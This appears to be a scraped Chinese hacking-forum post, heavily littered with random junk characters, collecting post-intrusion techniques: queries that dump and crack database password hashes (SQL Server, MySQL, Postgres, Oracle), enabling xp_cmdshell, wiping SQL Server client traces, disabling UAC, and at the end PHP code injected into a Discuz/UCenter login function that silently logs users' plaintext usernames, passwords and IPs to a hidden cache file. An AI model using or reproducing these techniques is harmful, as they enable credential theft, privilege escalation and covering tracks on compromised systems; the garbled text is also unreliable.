各种类型数据库抓HASH破解最高权限密码!2 S9 X1 @: U3 m( z0 Z5 K. h9 x' @
1.sql server2000
: _# x* K4 s4 ]: A# {6 }2 V( uSELECT password from master.dbo.sysxlogins where name='sa'
8 f6 }9 j- e: ?& N( P l0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341) C3 s( }( D% L8 c5 Z8 G# r
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A0 j, Y E2 z2 P5 o4 a% K, A: o! `3 X
9 s) B4 L# T, ]% T: z" w& N- H& M, c0×0100- constant header: P$ U8 @, l0 K/ E
34767D5C- salt1 |; }! s8 E! y! ^
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
?; e* }) y1 `; W3 ?. E' H& ^2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
. ]" G+ Z4 o' T& H; _# tcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash2 J: F# V4 ^8 N! Y; c! N. @
SQL server 2005:-1 k, M- L4 S0 }- w! U
SELECT password_hash FROM sys.sql_logins where name='sa'8 `' c# A! M& U3 _
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F) c4 O4 N! J' u- X# N7 U+ S5 @
0×0100- constant header5 n# c. W9 _4 z: K
993BF231-salt
. T2 ^! _5 V& U5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
: d$ u/ k. u( P" i% c) i- O& [$ ~& _crack case sensitive hash in cain, try brute force and dictionary based attacks.0 f/ M6 x1 O2 v& p) L
% T: F! {! n2 {" p1 _update:- following bernardo’s comments:-2 C/ A [ u5 n& v( t
use function fn_varbintohexstr() to cast password in a hex string.+ F8 G+ A& ?# V3 }/ l8 c7 e! G
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins+ [: {- o! X/ \+ W( F2 A
4 M8 [/ n- L- F1 ~8 O, B
MYSQL:-, _4 L+ @! s7 I7 X2 ~- {
" I8 Y2 u7 W# u3 M# V; o) F; A) q
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
4 P" P+ q0 v! x% y
( a7 {4 A) k3 I4 v$ X. {+ r*mysql < 4.1. K" N5 e& Y2 A& w
& W0 c) C* l2 G& Emysql> SELECT PASSWORD(‘mypass’);% p1 i# C- c, {1 g2 j( W
+——————–+
8 ?* r, X# C2 _| PASSWORD(‘mypass’) |
' |2 o' q, K* U& z7 q& ?+——————–+
# Y: ^/ k* d8 U/ Q# @| 6f8c114b58f2ce9e |
% o4 Q# W" B' ^7 ~/ d+——————–+1 X( M$ V. q' I& A
. a5 ~" `8 M* l1 k8 Y. z: {8 Y1 w*mysql >=4.17 O& |5 x) Y: H: q3 k
Q! g$ X/ H, w0 Y2 R' I+ _* z
mysql> SELECT PASSWORD(‘mypass’); _1 C* l6 G( k3 K% B
+——————————————-+
' w( }; ]* t; V: u. _3 E$ H| PASSWORD(‘mypass’) |: y; J/ e; b9 ?- |/ [& D
+——————————————-+& c$ n, b- s; x7 q8 T) h
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
' P1 @; h, M5 a' p8 t3 Y+——————————————-+
" E6 E3 T9 j/ P
: c4 P2 d- }4 q P3 v) _Select user, password from mysql.user& ^: b5 _ w& [3 B1 u# P3 i4 h5 G) T
The hashes can be cracked in ‘cain and abel’
& W$ u: F5 I6 V
& Y0 j+ w9 W/ wPostgres:-
- H4 M) n$ _6 \, @, N, F1 ]Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
2 _9 ?2 N* ]( G5 vselect usename, passwd from pg_shadow;
: d3 R/ Q& s U$ Dusename | passwd
: ~) k, B9 P- b2 f/ m——————+————————————-
7 O. K6 ~( v; u# _7 \4 M8 @8 I% x0 qtestuser | md5fabb6d7172aadfda4753bf0507ed4396
5 X' m5 B. k% B) q! Iuse mdcrack to crack these hashes:-' x) @+ ]5 m* \% [3 v/ B
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396 M8 T- C z7 Q
9 S/ S9 v; K' V7 r/ \0 u
Oracle:-1 g: L( u. u4 I: k2 d! Q
select name, password, spare4 from sys.user$( U6 `8 Z1 y4 T$ [( k) Z# }
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
$ V8 P# Q! E( w+ D1 O8 [+ Z8 U sMore on Oracle later, i am a bit bored….( T4 R: ~$ W5 F/ \* i
4 @7 f0 V0 ~: n; l( r% g: t5 A) \7 J" F9 w9 E
在sql server2005/2008中开启xp_cmdshell
" n6 }$ _" R$ f+ {6 K- y/ O-- To allow advanced options to be changed.
' _9 m+ \# ?; `% ?8 TEXEC sp_configure 'show advanced options', 1 o4 r& a: g1 E8 O8 l$ [! \& n
GO
9 r' j9 N1 k5 I$ m0 x7 G-- To update the currently configured value for advanced options.
: ^1 R% l! _) ]6 _- SRECONFIGURE2 M3 M: m; k e0 [7 U3 x4 R
GO. X9 }/ I' O( g! k3 P9 W; X7 C
-- To enable the feature.
: }1 n) i& \3 N$ _1 @EXEC sp_configure 'xp_cmdshell', 1 v4 k7 ~! V+ D( w# i/ h
GO$ U1 z) \; I1 P; B
-- To update the currently configured value for this feature.: _1 X4 A/ R! N# l
RECONFIGURE
( X& L' q' U6 u4 |( f6 HGO
7 T; p" W f5 {: dSQL 2008 server日志清除,在清楚前一定要备份。
+ \( ?! a, ^7 J+ M+ m如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:) P* [; {: t3 J4 ^; l/ A; j
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
3 s4 k I' `+ `. Q" v# L2 X+ A+ h: T! C5 ]
对于SQL Server 2008以前的版本:' i7 y+ X+ V) E5 e
SQL Server 2005:
* R9 k4 }- _% Z5 C7 R9 G删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
; ^. P9 V* _- f% s; vSQL Server 2000:
1 K. ~! B) g9 |1 c5 H清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。1 u" R" `$ s. m* \4 V; g
' B# H9 R# q9 i9 i" _; c
本帖最后由 simeon 于 2013-1-3 09:51 编辑7 x8 ^! @# s6 y( W8 ^( U
% v: K/ ?5 K/ w3 R3 C2 q7 C- L
! R4 }" U# p' Iwindows 2008 文件权限修改
% E z$ Z8 `8 k1 S0 |1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx; |% b4 H. a% M* k7 Z2 d
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98- z6 l) @: s6 o0 t- n, v
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
k I) f/ R p$ a* w; m: H; J
Windows Registry Editor Version 5.00
8 j' d! V" h8 e4 ?[HKEY_CLASSES_ROOT\*\shell\runas]3 ~" }5 N w# N( N/ G4 `: l
@="管理员取得所有权"9 \9 u! U2 e8 I) N$ H6 p
"NoWorkingDirectory"=""9 {& l& W0 T6 v; m* x
[HKEY_CLASSES_ROOT\*\shell\runas\command]3 [* A; x% W- b6 V
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 m1 @# H; {4 C5 \4 u) L
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, F9 @: `8 p% h7 o: r; j1 F[HKEY_CLASSES_ROOT\exefile\shell\runas2]
' O7 ^8 u" g. p [. `@="管理员取得所有权"
: m# [7 [2 J4 u9 z"NoWorkingDirectory"=""; b& t' \+ k" o
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]7 ]8 ?2 |" D& Y; F( s! L9 s* @
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
9 m( y) C$ n0 _+ `5 W/ \4 C( \"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
, c& m) C3 L3 b- {2 t0 `$ }+ N7 r3 s/ V8 C2 M
[HKEY_CLASSES_ROOT\Directory\shell\runas]
: M$ T9 G5 \0 m: D) [: t7 P$ I@="管理员取得所有权"& ~; v$ W0 j4 l' r& U: s
"NoWorkingDirectory"="" h6 Z* x( J( J9 n
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
* m2 e. T' U9 i8 d) y@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 H/ p. V- n0 n" P' k"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
. S( d1 c2 j4 C( _5 f6 |2 O4 X
( W8 U: ^1 z& m* K/ F1 j0 ~
# ?) |, R; W( j% A, u" x" U6 vwin7右键“管理员取得所有权”.reg导入
9 \0 [$ m" E3 q$ j5 O; D7 j: Q& X s二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,1 K, ?% |7 v0 y Y; a7 h h7 j
1、C:\Windows这个路径的“notepad.exe”不需要替换
" R1 s0 V0 t: Q* G w5 e* P2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
9 y, `4 z- S; U9 K# y0 l3、四个“notepad.exe.mui”不要管! P7 l6 |; a2 b. v, l0 d
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
( w& ~$ |7 H6 j- a W" b* ^C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”) C" g- O% j3 S7 I; P$ X, Z+ |
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
6 r! A8 g) ~( r+ l替换完之后回到桌面,新建一个txt文档打开看看是不是变了。% s+ i, p8 I6 t1 ?: F3 t
windows 2008中关闭安全策略: & s6 G W. T: z7 [% I1 t
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f! h# m9 ^( {3 ~; j4 w
修改uc_client目录下的client.php 在
$ e3 U/ O0 s& _5 pfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {) e- Y Q# |. ^' }, J
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php' R, e; S0 W; K. A5 P4 k
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
- h8 p' [+ s. m- Rif(getenv('HTTP_CLIENT_IP')) {
+ i( p. ?% w. J( R$onlineip = getenv('HTTP_CLIENT_IP');
( s' J! A, W( a% j7 n} elseif(getenv('HTTP_X_FORWARDED_FOR')) {9 p2 j$ d0 g/ y- M/ w" @
$onlineip = getenv('HTTP_X_FORWARDED_FOR');2 a# h4 U) X3 }. ~. q9 d
} elseif(getenv('REMOTE_ADDR')) {6 u; z+ i: `' E& l$ c- }8 C
$onlineip = getenv('REMOTE_ADDR');1 M- V. \2 U; B4 H& L' a
} else {
3 b$ {& S, L9 w. M4 W" I$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
2 \3 Y* ~; H* o4 r4 a2 ~$ v) }' p}
& F* \& Y. r0 e1 z2 t $showtime=date("Y-m-d H:i:s");
$ D, l1 d( b! Z6 @& B2 I; ?$ f! f- [ $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
& M8 p% i3 Q( ` $handle=fopen('./data/cache/csslog.php','a+');! E8 e9 z5 z& T
$write=fwrite($handle,$record); |